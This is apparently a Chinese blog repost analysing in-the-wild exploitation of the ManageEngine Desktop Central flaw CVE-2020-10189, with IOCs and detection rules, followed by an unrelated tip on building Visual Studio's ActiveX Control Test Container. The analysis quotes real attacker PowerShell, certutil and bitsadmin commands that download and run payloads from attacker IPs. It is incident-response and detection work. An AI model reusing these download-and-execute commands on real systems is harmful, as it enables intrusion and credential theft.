activex control test container 服务器正在运行中_Desktop Central服务器RCE漏洞在野攻击分析...

f65741e2280fcad9d18194db9334d9a1.gif

8ae1c2b0e77daf895cbade1e05746acb.png

0x01 漏洞披露

在研究Desktop Central漏洞的过程中,我们在推特上找到了一位研究人员的帖子,该研究人员于2020年3月5日披露了Desktop Central的RCE漏洞。

Zoho ManageEngine Desktop Central 10允许远程执行代码,漏洞成因是FileStorage类的getChartImage中的不可信数据反序列化,此漏洞和CewolfServlet,MDMLogUploaderServlet Servlet有关。

对CVE-2020-10189的研究还显示,可以在Shodan上搜索易受攻击的Desktop Central服务器。

f88b3d0e54e1bcc5271a0abaa7a5818e.png

图2-在Shodan上可搜索的易受攻击的Desktop Central服务器

在公网发现的威胁是有可疑的PowerShell下载通讯录,该通讯录包含下载文件的说明。

最早威胁活动之一是一些可疑的PowerShell下载命令。该命令包含指令,以下载install.bat并storesyncsvc.dll到C:\Windows\Temp,然后立即执行install.bat(图3)。

 cmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat

56bf9e13da3cf7e145010975b895a931.png

图3-可疑的PowerShell下载命令

该install.bat脚本包含storesyncsvc.dll作为服务安装在系统上的说明。(图4)。

ae421fcad8baff1d9b5ef87981e31ecc.png

图4-Install.bat的内容

在运行PowerShell命令后,我们观察到安装了服务名称StorSyncSvc和显示名称为Storage Sync Service(图5)的新服务。

712a565e526e8c51ce09e765b86d868c.png

‍ ‍图5-安装Storage Sync Service‍ ‍

VirusTotal上的查询结果表明,一些检测引擎已经归类storesyncsvc.dll为恶意软件。

https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details

8ae1c2b0e77daf895cbade1e05746acb.png

0x02 利用过程跟踪识别漏洞利用

此RCE漏洞已于2020年3月5日通过Twitter公开。

回顾Sysmon流程创建事件,表明C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe流程是负责执行PowerShell Download命令的流程(图6)。

a11e5797615b9a449121a133110f815d.png

图6-ParentImage负责PowerShell的下载

查看内存中的进程,我们还观察到Desktop Central java.exe应用程序cmd.exe和2.exe之间的父/子进程关系(图7)。

08ca8cda41968cf72c55d025b2a799bf.png

图7- java.exe父/子进程关系

8ae1c2b0e77daf895cbade1e05746acb.png

0x03 利用文件系统识别漏洞利用

为了进一步验证我们的理论,我们将从受影响的Desktop Central服务器收集的信息与已发布的POC进行了比较,确定攻击者可能利用了CVE-2020-10189漏洞在此易受攻击的系统上运行代码。

通过文件系统时间轴分析,我们确定遍历文件写可能已在具有文件名_chart(图8)和logger.zip(图9)的系统上发生。 

71fe84c5200c0d7497751965db571dba.png

图8- _chart文件系统分析

e4f85b7bd10cf984252cc66953c32c02.png

图9- logger.zip文件系统分析

这些文件名也在@Steventseeley发布的POC中进行了引用(图10)。

88b51e1c0772c8b31e61865f5d2141a4.png

图10-POC中对_chart和logger.zip的引用,参考:https : //srcincite.io/pocs/src-2020-0011.py.txt

8ae1c2b0e77daf895cbade1e05746acb.png

0x04 引入系统命令

在随后的流程创建日志中,cmd.exe使用certutil.exe命令来下载和执行2.exe(图11),进一步的分析表明,很有可能   2.exe可能是C2工具Cobalt Strike的一部分。

 cmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe && 2.exe

ed79ae8c907c0079b15105bf121e6067.png

图11-Certutil命令

OSINT透露2.exe已被VirusTotal上的多个检测引擎识别为恶意软件:https://www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/details

利用app.any.run沙箱(图12)和对恶意软件的内存分析,进一步证实2.exe托管Cobalt Strike Beacon payload的可能性。

8932f14dc3c522bd2cf3f8e686cca74d.png

图12- 2.exe被判定为恶意软件

https://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-8e6d-94c6c80a74b6

我们对已知恶意软件2.exe所使用的所有内存段进行了yara扫描,yara扫描结果进一步支持了2.exe在其他几种可能的恶意软件签名的理论(图13)。

474441c760c40c59f7113d27e6b83057.png

图13-Yarascan扫描结果

利用Volatility的恶意插件,我们确定了几个可能存在代码注入迹象的内存部分,我们对另一个由malfind转储的内存段进行了yara扫描,进一步证实了我们的猜想。

在下面的记录中可以看到整个过程(图14)。

(原文中查看完整过程)

图14-Yarascan验证结果

然后,我们检查了malfind的输出以获得代码注入的证据,并确定了其中的可疑内存部分svchost.exe(图15)。OSINT的研究使我们找到了一位研究人员,该研究人员对恶意软件进行了逆向,并找到了负责向其中注入代码的部分svchost.exe(图16)。 

0eb5e9a784b1cf0fb493ae647f575832.png

图15-对包含注入代码的svchost的分析

262bdaa3088a6f1ab2305bce254b9ac8.png

图16-@VK_Intel的分析显示了可能的注入功能

参考:

c5f97c256073f14001488f161900ef95.png

在攻击结束后,我们观察到了恶意的Bitsadmin命令,其中包含install.bat从66.42.96.220可疑端口12345进行转移的指令。

我们的分析师观察到,bitsadmin命令正在Desktop Central服务器上运行,该命令包含在PowerShell下载命令中调用的相同IP地址,端口和相同的install.bat文件(图17)。

cmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat C:\Users\Public\install.bat

0628d4624481be3b314ed4c7da6f71fa.png

图17-Bitsadmin命令

8ae1c2b0e77daf895cbade1e05746acb.png

0x05 访问凭证

我们还观察到了潜在的凭证访问活动。攻击者执行凭据转储的常用技术是使用恶意进程(SourceImage)访问另一个进程(TargetImage),最常见的是将lsass.exe作为目标,因为它通常包含敏感信息,例如帐户凭据。

在这里,我们观察到SourceImage 2.exe访问TargetImage lsass.exe(图18)。Cobalt Strike Beacon包含类似于Mimikatz的本机凭证转储功能,使用此功能的唯一必要条件是攻击者具有的SYSTEM特权,以下事件提供了充分的证据证明凭证访问的风险很高。

edfadae063f5f807ba43fefbb6976477.png

图18- 2.exe访问lsass.exe

在对这种入侵进行分析的过程中,我们向Eric Zimmerman的KAPE工具添加了一些收集目标功能,以将相关日志添加到分类工作中。

工具地址:https://binaryforay.blogspot.com/2019/02/introducing-kape.html

针对相关日志的用法示例:

 kape.exe --tsource C: --tdest c:\temp\tout --tflush --target ManageEngineLogs

Sigma项目的Florian Roth创建了一个签名来检测攻击者利用的某些技术:

https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_2020_10189.yml

我们对该攻击的分析还发现,在进程创建日志中基于命令行活动进行检测将很有价值:

 ParentImage | endswith: 

  'DesktopCentral_Server\jre\bin\java.exe'

 CommandLine | contains: 

  '*powershell*'

  '*certutil*'

  '*bitsadmin*'

8ae1c2b0e77daf895cbade1e05746acb.png

0x06 IOCs

·Storesyncsvc.dll

· MD5: 5909983db4d9023e4098e56361c96a6f

· SHA256: f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c

·Install.bat

· MD5: 7966c2c546b71e800397a67f942858d0

· SHA256: de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc

·2.exe

· MD5: 3e856162c36b532925c8226b4ed3481c

· SHA256: d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309

· 66[.]42[.]98[.]220

· 91[.]208[.]184[.]78

· 74[.]82[.]201[.]8

参考及来源:https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/ https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle

908a8772f3064c848d46730ec949c8a9.png

4660b15a3626cd82dc15bf4aff89e572.png

vs2010 添加 ActiveX Control Test Container工具(转载) vs2010的TSTCON( ActiveX Control Test Container )工具非自动安装,而是作为一个例程提供。所以应找到该例程,并编译: 如vs2010安装在默认路径则 1, 进入:C:\Program Files\Microsoft Visual Studio 10.0\Samples\1033,可找到VC2010Samples.zip文件, 2, 将其解决到同一个文件夹,解压后将出现一个C++子文件夹。 3, TstCon例程在:C:\Program Files\Microsoft Visual Studio 10.0\Samples\1033\C++\MFC\ole\TstCon,双击其的.sln文件启动工程,直接编译, 4, 编译后在Debug子文件夹将出现一个TstCon.exe文件,将其复制到:C:\Program Files\Microsoft Visual Studio 10.0\Common7\Tools文件夹。 5, 在vs2010的Tools菜单点击“External Tools...”,出现如下对话框,点击“Add”添加一项工具。 6, 新工具项的"Title"为:ActiveX Control Test Container,"Command"为:C:\Program Files\Microsoft Visual Studio 10.0\Common7\Tools\TstCon.exe。 7, 确认退出对话框,Tools菜单将出现“ActiveX Control Test Container”菜单项。完毕! 同理在2015安装目录下找到并编译: 但是编译的时候需要区分win32和x64的不同平台生成的工具 分别添加 ActiveX Control Test Container 32和 ActiveX Control Test Container 64的工具,因为不同工具显示的是不同平台注册的com组件,比如你注册一个32位的com组件,此时只能用ActiveX Control Test Container 32测试,而在ActiveX Control Test Container 64是找不到这个com组件的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值